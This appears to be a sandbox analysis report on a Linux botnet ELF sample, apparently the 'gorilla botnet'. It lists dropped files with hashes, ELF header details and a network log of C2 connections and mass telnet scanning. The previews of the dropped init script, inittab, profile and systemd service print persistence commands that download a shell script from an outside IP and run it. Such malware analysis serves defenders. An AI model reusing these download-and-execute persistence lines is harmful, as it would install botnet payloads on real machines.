Preview:	#!/bin/sh.# /etc/init.d/sh..case "" in. start). echo 'Starting sh'. /bin/sh &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping sh'. killall sh. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	98
Entropy (8bit):	4.615605979741142
Encrypted:	false
SSDEEP:	3:TKH4v9+KFyFiLdjX48FIbILpaKB0dFLoKE0:h8KooZX48bzBeLXE0
MD5:	FE7F857A52EC42881A76D01D4A4A1C3C
SHA1:	6391FE715F06AB2D7E58D18A41ED3A358C7E820C
SHA-256:	20B80070DF0EDB6A011753C41051823E2F87C46A5493D6323BB5C023A19D2870
SHA-512:	4AA09F596ACE2DA18FE88DA2224681EAB2A4F77D005E2C67E97E9A0751C387F8DCCD8D1BB05644D75ED2F42959B6EE491D292F80CFEBB5D80EA5F0CE84C47816
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh./bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	103
Entropy (8bit):	4.612417623467759
Encrypted:	false
SSDEEP:	3:nAWu5YFtSyLdjX48FIbILbaaFOdFXa5O:A6HSYZX48bbaaeXCO
MD5:	175C6814BBE06EB5816EFE3FE3934230
SHA1:	8C1A49BF7CA134E8AD0DDA70872367062BC600C5
SHA-256:	11CB198833B5FB514AF33682A7148F95AA28CAEA16908A27FA10D71DD272730E
SHA-512:	C1A6BC79D50EEED397A98329E7A2CD7486CBB36F9D3B25AEADA15473D10C31FC2F44D2029F5A174FC813E3BB6B974174850989BF2ADD642F4CD4F1D279B6B1F1
Malicious:	false
Reputation:	low
Preview:	::respawn:/bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.486383977913608
Encrypted:	false
SSDEEP:	3:pKWNFyFiLdjX48FIbILbaaFOdFXa50:kKooZX48bbaaeXC0
MD5:	CEC61C0CDC61AB271C45B85281469388
SHA1:	E2DC08B86AC16A6A9BDA73D26DE0055528C647D9
SHA-256:	AE69256D9ACCEE8C05AFBF46267368A0DDB3E5C9C54D24CFB018A35FEF86C560
SHA-512:	71A65EB5CBBD53E395E8A2B392CB41E289874583C4A17E086498201C6078E5043B680B4971D1913863B2699626F05F63B0936BAFCE9A8F01C6DBAFEE5E93F2A7
Malicious:	true
Preview:	/bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.064804988275458
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+Gs2+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+y+GWRdtd+GWRXY+GWRuL1I
MD5:	8156A50E9D158639626649BD134E7D5D
SHA1:	D95D108656621F4B4F82B93CA0694D66F4A2FEF4
SHA-256:	FB7F3B6DA55120E08AB0B9A9F4A9ECB1BB5D89BFD665EBE23C150FBFBC06E4D8
SHA-512:	DB79A871E5317E3B9A93FF84E71318F5ABC85EBDE7C9521DF35C20C0AD8251BEB3DB33673BE4F4FF2501256613C50128BA36323C0DECD348FF6CA8A73856BE10
Malicious:	false
Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/bin/sh.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/run/user/127/dconf/user

Download File

Process:	/usr/libexec/gsd-housekeeping
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	93B885ADFE0DA089CDF634904FD59F71
SHA1:	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
SHA-256:	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
SHA-512:	B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
Malicious:	false
Preview:	.

Static File Info

General

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.4885532209033085
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	x86_32.nn.elf
File size:	95'984 bytes
MD5:	c32c3d338238953b22589c540fd85e64
SHA1:	f8fc4a3ffd7a1fdf307a73e68edede3ee2eb49f6
SHA256:	abc37ba47cc9897d2b0458c13a29350d3fb933a5dc605376e728961dc877a605
SHA512:	cf6ec71369d31583d513a644c68fb70dc006e34a81acc2b2024568a0aea42b24d23e83a9172fb9bcf2ac85209521451ec3b361f361868416248efea8232a29ef
SSDEEP:	1536:dX4kVQasoSXFlxNMgS+1BcmoTeAazvk2qHNvVTi7+O93zqF7zvuSmyQRZIcQ:dX4kVQrrXFzNMgSgweAgvkXHNvw7+u3W
TLSH:	EC935BC4E983E4F5EE4615361177E73ACB72E57A1038FA17DF58A632EC82610A61738C
File Content Preview:	.ELF....................d...4...`u......4. ...(......................f...f...............p.......... ... +..........Q.td............................U..S.......wo...h.....6..[]...$.............U......= ....t..5....$......$.......u........t....h............

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8048164
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	95584
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x8048094	0x94	0x1c	0x0	0x6	AX	1
.text	PROGBITS	0x80480b0	0xb0	0x13636	0x0	0x6	AX	16
.fini	PROGBITS	0x805b6e6	0x136e6	0x17	0x0	0x6	AX	1
.rodata	PROGBITS	0x805b700	0x13700	0x2fdc	0x0	0x2	A	32
.ctors	PROGBITS	0x805f000	0x17000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x805f008	0x17008	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x805f020	0x17020	0x500	0x0	0x3	WA	32
.bss	NOBITS	0x805f520	0x17520	0x2600	0x0	0x3	WA	32
.shstrtab	STRTAB	0x0	0x17520	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0x166dc	0x166dc	6.5990	0x5	R E	0x1000	.init .text .fini .rodata
LOAD	0x17000	0x805f000	0x805f000	0x520	0x2b20	5.4299	0x6	RW	0x1000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 08:02:48.947789907 CET	38964	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.067641020 CET	199	38964	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.067703009 CET	38964	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.068650007 CET	38964	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.069550991 CET	38964	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.070794106 CET	38966	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.188726902 CET	199	38964	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.190506935 CET	199	38966	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.190556049 CET	38966	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.191129923 CET	38966	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.191497087 CET	38966	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.193984032 CET	38968	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.231986046 CET	199	38964	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.310815096 CET	199	38966	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.313709021 CET	199	38968	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.313751936 CET	38968	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.321796894 CET	38968	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.323720932 CET	38968	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.338923931 CET	38970	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.351953983 CET	199	38966	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.434050083 CET	443	33606	54.171.230.55	192.168.2.23
Dec 5, 2024 08:02:49.434161901 CET	33606	443	192.168.2.23	54.171.230.55
Dec 5, 2024 08:02:49.441517115 CET	199	38968	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.458750963 CET	199	38970	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.458801985 CET	38970	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.462428093 CET	38970	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.465533972 CET	38970	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.469850063 CET	38972	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.484039068 CET	199	38968	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.553976059 CET	443	33606	54.171.230.55	192.168.2.23
Dec 5, 2024 08:02:49.582058907 CET	199	38970	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.590244055 CET	199	38972	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.590291977 CET	38972	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.591743946 CET	38972	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.593305111 CET	38972	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.597075939 CET	38974	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.628021955 CET	199	38970	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.747864008 CET	199	38972	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.747879028 CET	199	38974	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.747924089 CET	38974	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.749459028 CET	38974	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.755300999 CET	38974	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.758793116 CET	38976	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.796884060 CET	199	38972	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.820239067 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 5, 2024 08:02:49.830105066 CET	37096	23	192.168.2.23	129.174.103.29
Dec 5, 2024 08:02:49.830115080 CET	57540	23	192.168.2.23	200.15.44.155
Dec 5, 2024 08:02:49.830121040 CET	49048	23	192.168.2.23	212.129.157.204
Dec 5, 2024 08:02:49.830137014 CET	55896	23	192.168.2.23	219.4.115.95
Dec 5, 2024 08:02:49.830153942 CET	40312	23	192.168.2.23	145.223.199.144
Dec 5, 2024 08:02:49.830159903 CET	42504	23	192.168.2.23	28.135.226.21
Dec 5, 2024 08:02:49.830163002 CET	60714	23	192.168.2.23	140.197.190.186
Dec 5, 2024 08:02:49.830166101 CET	46120	23	192.168.2.23	210.129.200.221
Dec 5, 2024 08:02:49.830173969 CET	39732	23	192.168.2.23	86.95.2.60
Dec 5, 2024 08:02:49.830180883 CET	40856	23	192.168.2.23	9.133.96.39
Dec 5, 2024 08:02:49.830200911 CET	38582	23	192.168.2.23	56.113.94.213
Dec 5, 2024 08:02:49.830214024 CET	36066	23	192.168.2.23	151.249.42.76
Dec 5, 2024 08:02:49.830233097 CET	45338	23	192.168.2.23	120.157.94.218
Dec 5, 2024 08:02:49.830240965 CET	43340	23	192.168.2.23	26.202.86.167
Dec 5, 2024 08:02:49.830264091 CET	55644	23	192.168.2.23	222.202.140.133
Dec 5, 2024 08:02:49.830303907 CET	45124	23	192.168.2.23	70.162.134.108
Dec 5, 2024 08:02:49.830303907 CET	35166	23	192.168.2.23	163.206.140.184
Dec 5, 2024 08:02:49.830305099 CET	55540	23	192.168.2.23	9.38.169.204
Dec 5, 2024 08:02:49.830305099 CET	59074	23	192.168.2.23	56.201.235.136
Dec 5, 2024 08:02:49.830308914 CET	45848	23	192.168.2.23	58.65.241.107
Dec 5, 2024 08:02:49.830312014 CET	59380	23	192.168.2.23	160.106.164.183
Dec 5, 2024 08:02:49.830328941 CET	36240	23	192.168.2.23	6.94.1.73
Dec 5, 2024 08:02:49.830341101 CET	51414	23	192.168.2.23	177.21.18.87
Dec 5, 2024 08:02:49.830351114 CET	54168	23	192.168.2.23	185.29.24.192
Dec 5, 2024 08:02:49.830358028 CET	50296	23	192.168.2.23	86.156.177.32
Dec 5, 2024 08:02:49.830368042 CET	55208	23	192.168.2.23	114.208.224.169
Dec 5, 2024 08:02:49.830378056 CET	53204	23	192.168.2.23	110.60.14.240
Dec 5, 2024 08:02:49.830383062 CET	44752	23	192.168.2.23	209.149.251.100
Dec 5, 2024 08:02:49.830403090 CET	34288	23	192.168.2.23	108.68.190.123
Dec 5, 2024 08:02:49.830411911 CET	34282	23	192.168.2.23	200.96.208.141
Dec 5, 2024 08:02:49.830411911 CET	50714	23	192.168.2.23	71.118.23.202
Dec 5, 2024 08:02:49.830454111 CET	49234	23	192.168.2.23	212.116.154.204
Dec 5, 2024 08:02:49.830478907 CET	58176	23	192.168.2.23	130.214.213.120
Dec 5, 2024 08:02:49.830480099 CET	51514	23	192.168.2.23	19.241.51.176
Dec 5, 2024 08:02:49.830480099 CET	47404	23	192.168.2.23	182.149.182.79
Dec 5, 2024 08:02:49.830483913 CET	33524	23	192.168.2.23	44.154.217.157
Dec 5, 2024 08:02:49.830499887 CET	48500	23	192.168.2.23	121.177.189.157
Dec 5, 2024 08:02:49.830511093 CET	57312	23	192.168.2.23	175.191.68.88
Dec 5, 2024 08:02:49.830524921 CET	47002	23	192.168.2.23	211.218.239.156
Dec 5, 2024 08:02:49.830539942 CET	32842	23	192.168.2.23	116.31.85.121
Dec 5, 2024 08:02:49.830549002 CET	52510	23	192.168.2.23	12.78.245.231
Dec 5, 2024 08:02:49.830559969 CET	54562	23	192.168.2.23	122.208.231.185
Dec 5, 2024 08:02:49.830576897 CET	37032	23	192.168.2.23	97.30.217.167
Dec 5, 2024 08:02:49.830578089 CET	60122	23	192.168.2.23	139.21.121.102
Dec 5, 2024 08:02:49.830590010 CET	40084	23	192.168.2.23	191.79.127.213
Dec 5, 2024 08:02:49.830601931 CET	43056	23	192.168.2.23	150.61.48.142
Dec 5, 2024 08:02:49.830601931 CET	42596	23	192.168.2.23	39.253.242.12
Dec 5, 2024 08:02:49.830615997 CET	45244	23	192.168.2.23	218.43.149.218
Dec 5, 2024 08:02:49.830619097 CET	50556	23	192.168.2.23	83.94.159.199
Dec 5, 2024 08:02:49.830631971 CET	50588	23	192.168.2.23	116.126.230.31
Dec 5, 2024 08:02:49.830657959 CET	57588	23	192.168.2.23	88.241.232.173
Dec 5, 2024 08:02:49.830658913 CET	51014	23	192.168.2.23	73.168.122.219
Dec 5, 2024 08:02:49.830672979 CET	42516	23	192.168.2.23	49.86.94.59
Dec 5, 2024 08:02:49.830703974 CET	57590	23	192.168.2.23	66.111.1.41
Dec 5, 2024 08:02:49.830710888 CET	36354	23	192.168.2.23	182.79.105.76
Dec 5, 2024 08:02:49.830713987 CET	57890	23	192.168.2.23	138.153.76.148
Dec 5, 2024 08:02:49.830719948 CET	41122	23	192.168.2.23	22.51.246.174
Dec 5, 2024 08:02:49.830723047 CET	37058	23	192.168.2.23	126.178.131.206
Dec 5, 2024 08:02:49.830733061 CET	58400	23	192.168.2.23	135.104.249.188
Dec 5, 2024 08:02:49.830749989 CET	53904	23	192.168.2.23	21.160.33.184
Dec 5, 2024 08:02:49.830759048 CET	59248	23	192.168.2.23	187.103.242.245
Dec 5, 2024 08:02:49.830771923 CET	54352	23	192.168.2.23	88.204.146.7
Dec 5, 2024 08:02:49.830773115 CET	48872	23	192.168.2.23	119.20.76.243
Dec 5, 2024 08:02:49.830780983 CET	56594	23	192.168.2.23	116.24.104.134
Dec 5, 2024 08:02:49.830790043 CET	37086	23	192.168.2.23	58.10.75.114
Dec 5, 2024 08:02:49.830802917 CET	41856	23	192.168.2.23	219.235.6.49
Dec 5, 2024 08:02:49.830807924 CET	47540	23	192.168.2.23	196.208.109.239
Dec 5, 2024 08:02:49.830826998 CET	39566	23	192.168.2.23	86.3.196.5
Dec 5, 2024 08:02:49.830833912 CET	43748	23	192.168.2.23	86.188.53.172
Dec 5, 2024 08:02:49.830841064 CET	39968	23	192.168.2.23	159.32.231.50
Dec 5, 2024 08:02:49.830847979 CET	35666	23	192.168.2.23	41.244.104.33
Dec 5, 2024 08:02:49.830847979 CET	35570	23	192.168.2.23	101.75.160.223
Dec 5, 2024 08:02:49.830866098 CET	41092	23	192.168.2.23	186.8.160.224
Dec 5, 2024 08:02:49.830873013 CET	51710	23	192.168.2.23	157.246.109.62
Dec 5, 2024 08:02:49.830885887 CET	45810	23	192.168.2.23	88.11.252.160
Dec 5, 2024 08:02:49.830888033 CET	56200	23	192.168.2.23	48.155.61.30
Dec 5, 2024 08:02:49.830902100 CET	59794	23	192.168.2.23	219.82.58.82
Dec 5, 2024 08:02:49.830916882 CET	37848	23	192.168.2.23	26.127.145.209
Dec 5, 2024 08:02:49.830919981 CET	37800	23	192.168.2.23	192.81.84.23
Dec 5, 2024 08:02:49.830926895 CET	58256	23	192.168.2.23	64.197.192.50
Dec 5, 2024 08:02:49.830943108 CET	48822	23	192.168.2.23	139.157.203.71
Dec 5, 2024 08:02:49.830959082 CET	57088	23	192.168.2.23	68.217.38.17
Dec 5, 2024 08:02:49.830980062 CET	39788	23	192.168.2.23	53.156.2.56
Dec 5, 2024 08:02:49.830981016 CET	52024	23	192.168.2.23	11.126.189.65
Dec 5, 2024 08:02:49.830990076 CET	54296	23	192.168.2.23	208.14.132.76
Dec 5, 2024 08:02:49.830993891 CET	40124	23	192.168.2.23	154.194.52.21
Dec 5, 2024 08:02:49.831005096 CET	40092	23	192.168.2.23	49.144.37.64
Dec 5, 2024 08:02:49.831017017 CET	41592	23	192.168.2.23	32.135.216.72
Dec 5, 2024 08:02:49.831032038 CET	52456	23	192.168.2.23	215.136.166.39
Dec 5, 2024 08:02:49.831037045 CET	37176	23	192.168.2.23	36.163.114.52
Dec 5, 2024 08:02:49.831053972 CET	59530	23	192.168.2.23	131.255.253.249
Dec 5, 2024 08:02:49.831053972 CET	46122	23	192.168.2.23	189.255.81.119
Dec 5, 2024 08:02:49.831063032 CET	50590	23	192.168.2.23	56.140.154.121
Dec 5, 2024 08:02:49.831083059 CET	50762	23	192.168.2.23	144.168.24.148
Dec 5, 2024 08:02:49.831084967 CET	48010	23	192.168.2.23	36.82.145.157
Dec 5, 2024 08:02:49.831095934 CET	35950	23	192.168.2.23	217.250.67.26
Dec 5, 2024 08:02:49.831095934 CET	55280	23	192.168.2.23	166.153.125.255
Dec 5, 2024 08:02:49.831120968 CET	47682	23	192.168.2.23	121.145.192.109
Dec 5, 2024 08:02:49.831132889 CET	44992	23	192.168.2.23	78.79.41.122
Dec 5, 2024 08:02:49.831132889 CET	37158	23	192.168.2.23	18.10.246.197
Dec 5, 2024 08:02:49.831155062 CET	36218	23	192.168.2.23	37.65.113.12
Dec 5, 2024 08:02:49.831157923 CET	39548	23	192.168.2.23	46.250.181.70
Dec 5, 2024 08:02:49.831171989 CET	56588	23	192.168.2.23	61.233.196.40
Dec 5, 2024 08:02:49.831175089 CET	39872	23	192.168.2.23	27.123.203.123
Dec 5, 2024 08:02:49.831193924 CET	40862	23	192.168.2.23	147.201.255.206
Dec 5, 2024 08:02:49.831196070 CET	44812	23	192.168.2.23	113.177.123.244
Dec 5, 2024 08:02:49.831207991 CET	57400	23	192.168.2.23	138.226.170.110
Dec 5, 2024 08:02:49.831214905 CET	47606	23	192.168.2.23	80.205.19.197
Dec 5, 2024 08:02:49.831229925 CET	36698	23	192.168.2.23	19.1.248.192
Dec 5, 2024 08:02:49.831243038 CET	39544	23	192.168.2.23	54.208.207.93
Dec 5, 2024 08:02:49.831258059 CET	53782	23	192.168.2.23	111.15.95.101
Dec 5, 2024 08:02:49.831258059 CET	49418	23	192.168.2.23	49.52.200.230
Dec 5, 2024 08:02:49.831270933 CET	40326	23	192.168.2.23	193.8.57.105
Dec 5, 2024 08:02:49.831281900 CET	58298	23	192.168.2.23	114.232.54.239
Dec 5, 2024 08:02:49.831284046 CET	50738	23	192.168.2.23	107.248.86.231
Dec 5, 2024 08:02:49.831296921 CET	35464	23	192.168.2.23	29.249.30.124
Dec 5, 2024 08:02:49.831310987 CET	56422	23	192.168.2.23	164.237.248.89
Dec 5, 2024 08:02:49.831329107 CET	40174	23	192.168.2.23	108.130.142.170
Dec 5, 2024 08:02:49.831335068 CET	38172	23	192.168.2.23	92.61.78.162
Dec 5, 2024 08:02:49.831343889 CET	41448	23	192.168.2.23	198.5.158.151
Dec 5, 2024 08:02:49.831347942 CET	58672	23	192.168.2.23	16.90.195.142
Dec 5, 2024 08:02:49.831357002 CET	34044	23	192.168.2.23	105.111.169.139
Dec 5, 2024 08:02:49.831384897 CET	58884	23	192.168.2.23	65.241.23.79
Dec 5, 2024 08:02:49.831393003 CET	36100	23	192.168.2.23	107.7.192.212
Dec 5, 2024 08:02:49.831410885 CET	42294	23	192.168.2.23	164.131.85.26
Dec 5, 2024 08:02:49.831410885 CET	54948	23	192.168.2.23	97.99.188.128
Dec 5, 2024 08:02:49.831414938 CET	55470	23	192.168.2.23	168.212.74.188
Dec 5, 2024 08:02:49.831432104 CET	55000	23	192.168.2.23	46.205.168.229
Dec 5, 2024 08:02:49.831442118 CET	46506	23	192.168.2.23	68.117.139.38
Dec 5, 2024 08:02:49.831444979 CET	60404	23	192.168.2.23	102.20.168.0
Dec 5, 2024 08:02:49.831465006 CET	40766	23	192.168.2.23	149.212.228.32
Dec 5, 2024 08:02:49.831466913 CET	53524	23	192.168.2.23	188.164.69.107
Dec 5, 2024 08:02:49.831489086 CET	35740	23	192.168.2.23	177.167.178.56
Dec 5, 2024 08:02:49.831489086 CET	38912	23	192.168.2.23	159.19.209.164
Dec 5, 2024 08:02:49.831517935 CET	40312	23	192.168.2.23	18.64.241.39
Dec 5, 2024 08:02:49.831518888 CET	53852	23	192.168.2.23	106.200.173.19
Dec 5, 2024 08:02:49.831530094 CET	48148	23	192.168.2.23	29.113.94.55
Dec 5, 2024 08:02:49.831537962 CET	37902	23	192.168.2.23	174.88.124.185
Dec 5, 2024 08:02:49.831546068 CET	38496	23	192.168.2.23	140.35.152.3
Dec 5, 2024 08:02:49.831558943 CET	35000	23	192.168.2.23	163.112.139.45
Dec 5, 2024 08:02:49.831569910 CET	56338	23	192.168.2.23	48.48.234.153
Dec 5, 2024 08:02:49.831577063 CET	46872	23	192.168.2.23	78.203.215.202
Dec 5, 2024 08:02:49.831577063 CET	60422	23	192.168.2.23	128.25.97.132
Dec 5, 2024 08:02:49.831600904 CET	38230	23	192.168.2.23	79.101.112.237
Dec 5, 2024 08:02:49.831610918 CET	57422	23	192.168.2.23	45.71.25.54
Dec 5, 2024 08:02:49.831612110 CET	44828	23	192.168.2.23	26.38.126.244
Dec 5, 2024 08:02:49.831619978 CET	57666	23	192.168.2.23	151.114.66.86
Dec 5, 2024 08:02:49.831634045 CET	41804	23	192.168.2.23	57.159.205.203
Dec 5, 2024 08:02:49.831640959 CET	35010	23	192.168.2.23	76.14.39.41
Dec 5, 2024 08:02:49.831643105 CET	60088	23	192.168.2.23	5.18.62.230
Dec 5, 2024 08:02:49.831660986 CET	52906	23	192.168.2.23	35.110.47.19
Dec 5, 2024 08:02:49.831675053 CET	46082	23	192.168.2.23	211.200.199.151
Dec 5, 2024 08:02:49.831691027 CET	58544	23	192.168.2.23	1.126.222.164
Dec 5, 2024 08:02:49.831701994 CET	52390	23	192.168.2.23	172.175.32.64
Dec 5, 2024 08:02:49.831710100 CET	41972	23	192.168.2.23	163.146.76.9
Dec 5, 2024 08:02:49.831731081 CET	52608	23	192.168.2.23	9.237.213.78
Dec 5, 2024 08:02:49.831738949 CET	59374	23	192.168.2.23	133.202.32.185
Dec 5, 2024 08:02:49.831741095 CET	46742	23	192.168.2.23	216.240.251.4
Dec 5, 2024 08:02:49.831741095 CET	42396	23	192.168.2.23	193.84.59.198
Dec 5, 2024 08:02:49.831751108 CET	60376	23	192.168.2.23	81.97.1.51
Dec 5, 2024 08:02:49.831759930 CET	41980	23	192.168.2.23	130.250.11.206
Dec 5, 2024 08:02:49.831763029 CET	47284	23	192.168.2.23	55.48.154.119
Dec 5, 2024 08:02:49.831773043 CET	51726	23	192.168.2.23	49.131.105.123
Dec 5, 2024 08:02:49.831775904 CET	60628	23	192.168.2.23	143.191.157.249
Dec 5, 2024 08:02:49.831790924 CET	51448	23	192.168.2.23	194.145.118.247
Dec 5, 2024 08:02:49.831818104 CET	54454	23	192.168.2.23	77.219.167.39
Dec 5, 2024 08:02:49.831818104 CET	58188	23	192.168.2.23	5.102.186.168
Dec 5, 2024 08:02:49.831819057 CET	49320	23	192.168.2.23	47.159.109.247
Dec 5, 2024 08:02:49.831835032 CET	57664	23	192.168.2.23	52.160.229.236
Dec 5, 2024 08:02:49.831836939 CET	42524	23	192.168.2.23	141.22.216.117
Dec 5, 2024 08:02:49.831847906 CET	52136	23	192.168.2.23	93.69.61.87
Dec 5, 2024 08:02:49.831857920 CET	51750	23	192.168.2.23	62.163.203.230
Dec 5, 2024 08:02:49.831862926 CET	56508	23	192.168.2.23	96.222.218.77
Dec 5, 2024 08:02:49.831883907 CET	49436	23	192.168.2.23	68.217.169.32
